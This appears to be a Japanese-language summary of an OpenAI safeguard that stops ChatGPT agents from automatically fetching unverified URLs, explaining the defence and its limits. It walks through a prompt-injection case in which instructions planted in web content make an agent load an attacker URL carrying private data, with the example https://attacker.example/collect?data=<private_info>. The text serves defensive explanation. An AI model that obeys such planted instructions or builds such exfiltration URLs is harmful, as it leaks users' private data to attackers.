OpenAI AI エージェント リンク セーフティ

OpenAIは、URLを通じて機密ユーザーデータが漏洩するのを防ぐため、新しいセキュリティ対策を導入しました。ウェブ上で既に公開されているアドレスのみに自動的なURL取得を制限することで、ChatGPTにおけるエージェント体験に関連するURLベースのデータ漏洩リスクを軽減することを目的としています。

URLベースのデータ漏洩の防止

AIエージェントは、クエリパラメータとして埋め込まれたメールアドレスやドキュメントタイトルなどの機密ユーザー情報を含むURLをリクエストするように操作される可能性があります。ウェブサイトはサーバーログにリクエストされたURLを記録するため、モデルがチャットで機密情報を明示的に出力しなくても、攻撃者はこのプライベートデータをキャプチャできます。

このリスクは、プロンプトインジェクション技術によって増幅されます。攻撃者はウェブコンテンツに指示を配置し、モデルの動作を上書きしてエージェントが特定の悪意のあるURL(例: https://attacker.example/collect?data=<private_info>)をロードするように強制します。

従来のトラストリストの制限

OpenAIは、単純な「信頼できるサイトリスト」または許可リストが、主に以下の2つの理由で不十分であると指摘しています。

  1. Redirects: 信頼できるドメインで始まるリンクでも、攻撃者が制御する宛先にリダイレクトされる可能性があります。
  2. User Experience: 厳格な許可リストは過度の摩擦と「誤警報」を生み出し、これによりユーザーはセキュリティ警告を無視する可能性があります。

代わりにドメインの評判に焦点を当てるのではなく、OpenAIのアプローチは特定のURLが自動的に取得しても安全かどうかに焦点を当てます。

公開URL検証システム

URLにユーザー固有の機密情報が含まれていないことを確認するため、OpenAIはユーザーの会話、アカウント、または個人データにアクセスせずに公開URLを発見する独立したウェブインデックス(クローラー)を利用します。

エージェントが自動的にURLを取得しようとすると、システムはこのインデックスとURLを照合します。

  • Verified Public URLs: URLが以前に観測された公開URLと一致する場合、エージェントはそれを自動的に読み込みます。
  • Unverified URLs: 一致するものが見つからない場合、URLは未検証として扱われます。エージェントは別のサイトを試すように指示されるか、システムは警告ダイアログを通じて明示的なユーザーアクションを要求する可能性があります。

ユーザーインターフェイスとコントロール

リンクが公開として検証できない場合、ユーザーはそのリンクが検証されておらず、サードパーティーサイトと会話データを共有する可能性があるという警告を目にすることがあります。これにより、ユーザーの知識なしにバックグラウンドでリソースがロードされる可能性のある「静かなリーク」を防止します。

範囲とディフェンス・イン・デプス

このセーフガードは、リソース取得中にURL自身を通じたユーザー固有のデータ漏洩を防ぐために特別に設計されています。これはすべてのウェブセキュリティ問題に対する包括的なソリューションではありません。具体的には、以下を保証しません:

  • ウェブページ上のコンテンツの信頼性。
  • ソーシャルエンジニアリングに対する保護。
  • ページ上の誤解を招くまたは有害な指示の存在。

OpenAIはこれを、プロンプトインジェクションに対するモデルレベルの緩和策、製品コントロール、監視、継続的なレッドチーム演習を含む広範なディフェンス・イン・デプス戦略の一部として扱います。

Sources